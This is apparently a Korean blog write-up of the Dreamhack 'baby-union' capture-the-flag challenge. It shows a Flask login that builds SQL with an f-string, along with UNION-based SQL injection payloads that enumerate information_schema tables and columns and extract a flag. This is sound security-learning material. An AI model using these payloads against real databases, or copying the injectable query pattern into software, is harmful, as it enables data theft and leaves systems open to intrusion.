[Dreamhack/드림핵] baby-union

 

https://dreamhack.io/wargame/challenges/984

baby-union

---

[1] 문제 설명

 

 

 

 

 

우선 SQL INJECTION 취약점을 이용하여 위와 같은 입력값을 제출해주었다.

admin 계정으로 접근할 수 있었고, 별 의미 없는 테이블을 볼 수 있었다...

 

 

app.py를 살펴보자.

import os
from flask import Flask, request, render_template
from flask_mysqldb import MySQL

app = Flask(__name__)
app.config['MYSQL_HOST'] = os.environ.get('MYSQL_HOST', 'localhost')
app.config['MYSQL_USER'] = os.environ.get('MYSQL_USER', 'user')
app.config['MYSQL_PASSWORD'] = os.environ.get('MYSQL_PASSWORD', 'pass')
app.config['MYSQL_DB'] = os.environ.get('MYSQL_DB', 'secret_db')
mysql = MySQL(app)

@app.route("/", methods = ["GET", "POST"])
def index():

    if request.method == "POST":
        uid = request.form.get('uid', '')
        upw = request.form.get('upw', '')
        if uid and upw:
            cur = mysql.connection.cursor()
            cur.execute(f"SELECT * FROM users WHERE uid='{uid}' and upw='{upw}';")
            data = cur.fetchall()
            if data:
                return render_template("user.html", data=data)

            else: return render_template("index.html", data="Wrong!")

        return render_template("index.html", data="Fill the input box", pre=1)
    return render_template("index.html")


if __name__ == '__main__':
    app.run(host='0.0.0.0')

 

select 문을 실행시켜야 한다.

 

 

init.sql의 코드이다.

CREATE DATABASE secret_db;
GRANT ALL PRIVILEGES ON secret_db.* TO 'dbuser'@'localhost' IDENTIFIED BY 'dbpass';

USE `secret_db`;
CREATE TABLE users (
  idx int auto_increment primary key,
  uid varchar(128) not null,
  upw varchar(128) not null,
  descr varchar(128) not null
);

INSERT INTO users (uid, upw, descr) values ('admin', 'apple', 'For admin');
INSERT INTO users (uid, upw, descr) values ('guest', 'melon', 'For guest');
INSERT INTO users (uid, upw, descr) values ('banana', 'test', 'For banana');
FLUSH PRIVILEGES;

CREATE TABLE fake_table_name (
  idx int auto_increment primary key,
  fake_col1 varchar(128) not null,
  fake_col2 varchar(128) not null,
  fake_col3 varchar(128) not null,
  fake_col4 varchar(128) not null
);

INSERT INTO fake_table_name (fake_col1, fake_col2, fake_col3, fake_col4) values ('flag is ', 'DH{sam','ple','flag}');

 

fake_table_name 을 불러와야 플래그 값을 알 수 있는 것 같은데, 그러려면 primary key를 찾아야 한다.

 

 

 

그런데 admin 페이지 말고 플래그 값이 적힌 페이지로 접근하는 입력값을 알 수가 없어서 구글링을 통해 문제 풀이를 진행하였다.

 

 

---

 

 

Union SQL Injection

UNION은 SQL 쿼리문에서 두 개 이상의 SELECT 문의 결과를 합쳐 하나의 결과 집합으로 반환하는 기능을 제공한다. 이를 통해 다른 테이블의 데이터를 가져올 수 있어, 중요한 정보를 추출하는 데 유용하다.

UNION 연산자를 사용하기 위해서는 두 가지 조건을 만족해야 한다.

1) 기존의 SELECT문과 UNION SELECT문의 컬럼 수가 동일해야 한다.
2) 각각의 컬럼은 순서 별로 동일한 데이터형이어야 한다.

 

 

UNION 연산자를 사용하려면 컬럼 수를 알아내는 게 중요하다.

init.sql의 코드를 확인해보면 4개인 것 같은데, 맞는지 확인해보았다.

 

 

a' union select version(),null,null,null #

이 명령어를 통해

 

 

컬럼의 수가 4개임과 동시에 mariaDB를 사용하는 것을 알 수 있었다.

 

 

' union select table_name, null, null, null from information_schema.tables #

 

이 명령어를 통해 아래와 같이 원하는 table_name을 출력할 수 있다.

 

 

 

아래쯔음에 수상해보이는 onlyflag라는 table_name이 있는데, 접근해보도록 하자.

 

마찬가지로 column_name을 알기 위해

' union select column_name, null, null, null from information_schema.columns where table_name='onlyflag' #

 

이 명령어를 입력해보니

 

 

 

onlyflag 테이블에 있는 컬럼명을 알 수 있었다.

 

init.sql 의 코드 마지막 줄에 따르면,

INSERT INTO fake_table_name (fake_col1, fake_col2, fake_col3, fake_col4) values ('flag is ', 'DH{sam','ple','flag}');

 

 

flag 값은 svalue, sflag, sclose에 들어있으로

 

' union select sname, svalue, sflag, sclose from onlyflag #

 

이 명령어를 치면 flag is ...가 나오게 된다.

하지만 그 내용을 그대로 제출하면 틀린 정답이 된다.

우리가 볼 수 있는 컬럼의 개수가 3개이므로 3개만 출력이 되게 된다.

 

그러므로 sflag 값이 누락되어 있는 것을 다시 출력해주면 원하는 flag 값을 얻을 수 있다고 한다.

 

 

 

---

[2] 느낀 점

 

최근에 MySQL에 대해 처음 배워서 이 문제의 풀이 과정을 더 잘 이해할 수 있었던 것 같다.